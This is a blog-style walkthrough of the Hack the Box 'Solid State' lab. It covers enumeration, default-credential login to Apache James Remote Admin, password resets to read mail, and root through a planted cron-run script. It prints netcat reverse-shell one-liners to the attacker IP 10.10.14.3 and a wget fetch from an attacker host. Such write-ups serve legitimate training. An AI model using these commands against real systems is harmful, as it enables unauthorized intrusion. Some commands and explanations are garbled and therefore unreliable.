Hello Friends!! Today we are going to solve a CTF Challenge
“Solid State”. It is a lab that is featured in Hack the Box. They have an
amazing collection of Online Labs on which you can practice your penetration
testing skills online. They have labs ranging from beginner to Expert. Solid
State is a Retired Lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online therefore they have
a static IP. Solid State Lab has IP: 10.10.10.51.
Now, as always let’s begin our hacking with the port
enumeration.
Command: nmap 10.10.10.51 -sV -p- --open
As you can see in the above screenshot that couple of ports
open among which we have port 80, 110, 119, 4555.
The Port 80 is open so let’s open IP in out Browser to see
that if a website is hosted on the IP.
After opening the IP in the browser we can see that it is a
basic website nothing exited.
Now back to 4555, it runs service James Remote Admin 2.3.2. After searching a while on the internet,
I got that the default password for logging in the Remote Admin is root: root.
And it is a golden rule to apply the default credentials, so
let’s try to get in Remote Admin using the default credentials. For this we
will use netcat as shown below in image.
nc 10.10.10.51 4555
Great we have logged in on the Remote Admin Service, after
that we ran the HELP command to get
the List of working commands.
Here
listusers command draws our
attention, let’s see what it does. Great, we have the list of mail users on the
server.
Back to the HELP
command we had the setpassword
command. Let’s use it to change the passwords of all the users so that we
can further enumerate.
Command: setpassword
james 1234
Ok, so now we have the
users for the POP3 service and their passwords. Now lets dig into that, for
that we will use telnet.
telnet 10.10.10.51 110
User: John
Pass: 1234
LIST
After logging in using the
Credentials of the user john, we ran the command
LIST, which lists all the messages in jhon’s account. Let see if we find
something here.
Nope hardluck !! we didn’t get much in this but lets try another users
Again open a new telnet
session but this time we enter the Credentials of user Mindy.
telnet 10.10.10.51 110
User: Mindy
Pass: 1234
list
Using LIST we got the mails
in the account of mindy. Let’s open to see if we can get some hint to move
forward in the mail.
After opening the mail we
found sent mail from admin account by
James to mindy sharing his the SSH Login Credentials. It is
a Jackpot!!
Username:
mindy
Pass:
P@55W0rd12@
Let’s go and get the ssh
shell of the machine and use midy credential for login into ssh.
ssh mindy@10.10.10.51
Cool!! We got
access of victim’s PTS shell.
Since we have enumerated the target network and found Apache
James Serer 2.3.2 is running and after Browsing
through the internet we stumbled across the Exploit DB module shown below, now
copy the whole python code from here.
Paste above copied python code in a text file and make
following changes inside payload as highlighted in below image and then save
it, we have it as exploit.py on the
desktop.
nc -e /bin/sh
10.10.14.3 8000
Here 10.10.14.3 is attacker’s IP and 8000 is listening port
for reverse connection from targets network.
Now run above saved python file as I run using below
command:
./exploit.py
10.10.10.51
Ok Done! The Exploit
will work only when someone logs in. So let’s again login into SSH shell using the user Mindy’s Credentials and
as soon as we login the exploit begin to work as shown below.
Let’s open a netcat Listener to get the shell which will be
generated after our exploit gets completely executed. Now we need to import the
python file to reach the terminal and to do so type:
python -c
"import pty; pty.spawn('/bin/bash')"
Lovely!! So
again we got access of victim’s system shell but this time we had access TTys
shell of his system, now let check it directory.
ls
Here we can see user.txt
which indicates we have almost completed our 1st challenge.
I
had use cat command for reading
user.txt file and with this we had completed our first challenge.
Now let move towards 2nd challenge for root.txt
and currently we are in Mindy directory. For root.txt file we need to move into
root but I have no idea for further step. Then I recall Mindy has received a
mail from admin account send by James, there are chance of getting any hint
from James therefore I prefer to grep running process of James by executing
following command.
ps aux | grep james
Here aux will work as describe below:
a = display
processes for all users
u = show the process's user/owner
x = show processes not attached to a terminal
u = show the process's user/owner
x = show processes not attached to a terminal
Great!! It has shown
root process for opt file.
Then I move into /opt directory and run ls-al command for
exploring all files and folder inside this directory.
cd opt
ls-al
So it shown two files among which I’m interested in tmp.py file.
When I used cat
command for reading this file I found a python code inside it. This code
was useless for me and to me it useful I need to edit this file by adding
malicious code inside it therefore let copy this code first into a text file.
As given below in image you can see I had edit netcat
backdoor using following command and save the file tmp.py, then transfer this
file into victim’s system.
/bin/nc -e bin/bash
10.10.14.3 8081
I tried to download our malicious tmp.py file inside /opt it
get failed due to limited access therefore first I downloaded this file in /tmp directory using wget command.
wget
http://10.10.14.4/tmp.py
When it get successfully downloaded then I replace it into
/opt directory
cp tmp.py /opt
cd /opt
ls
Great!! We can
see tmp.py file inside /opt lets confirm this file using cat command
cat tmp.py
Yeppii!!! We had
successfully uploaded our one-liner netcat backdoor in victim’s system. Now
let’s start netcat in a new terminal reverse connection.
nc -lvp 8081
Then I run crontab -l
command for reverse connection and move back netcat terminal.
At netcat you will get reverse connection after 3 minutes
from the time you will run crontab command. We have the root shell. And just by
using the “ls” command we successfully located the root.txt
Great!! We
got our 2nd flag successfully Enjoy Hacking!!
0 comments:
Post a Comment